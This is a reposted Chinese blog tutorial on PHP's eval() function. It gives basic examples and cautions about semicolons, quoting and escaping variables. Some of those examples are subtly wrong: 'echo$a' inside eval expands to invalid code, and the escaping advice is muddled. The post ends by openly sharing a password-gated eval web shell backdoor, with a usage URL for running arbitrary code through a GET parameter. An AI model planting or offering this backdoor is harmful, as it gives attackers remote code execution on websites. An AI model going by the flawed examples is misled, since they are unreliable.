PHP eval函数

最新推荐文章于 2021-10-08 00:15:02 发布

weixin_33881050

最新推荐文章于 2021-10-08 00:15:02 发布

阅读量135

点赞数 2

CC 4.0 BY-SA版权

文章标签： php

原文链接：http://www.cnblogs.com/flzs/p/10241668.html

本文详细解析了PHP中的eval()函数，包括其基本用法、注意事项及潜在的安全风险。通过具体代码示例，展示了如何正确使用eval()进行动态代码执行，同时强调了在实际应用中应注意字符串末尾的分号、引号使用和变量转义等问题。

代码：
　　eval("echo'hello world';");
上边代码等同于下边的代码：
　　echo"hello world";
在浏览器中都输出：hello world
运用eval()要注意几点：
1.eval函数的参数的字符串末尾一定要有分号，在最后还要另加一个分号（这个分号是php限制）
2.注意单引号，双引号和反斜杠的运用。如果参数中带有变量时,并且变量有赋值操作的话，变量前的$符号钱一定要有\来转义。如果没有赋值操作可以不需要。
代码：
　　$a=100;
　　eval("echo$a;");
因为没有赋值操作，所以可以不用\来转义$.等同于以下代码：
　　$a=100;
　　eval("echo\$a;")
3.注意在命令式字符串（包括分号）两边必须要有双引号或者根据需要用单引号。否则报错。
命令式字符串是指：字符串中包括echo、print之类的命令的时候。
如果参数只有一个变量则可以不用。例如：

　　$func =<<<FUNC
　　function test(){ 
  　　echo "test eval function"; 
　　}
　　FUNC;

　　eval($func);
　　test();
分享个php eval后门程序
要求必须支持eval函数
使用方法
http://url/test.php?pwd=admin&action=eval&a=phpinfo();
<?php
　　$passwd="admin";if($_GET['pwd']!=$passwd)exit;
　　if($_GET['action']=="eval" && $_GET['a']){eval($_GET['a']);}
?>

转载于:https://www.cnblogs.com/flzs/p/10241668.html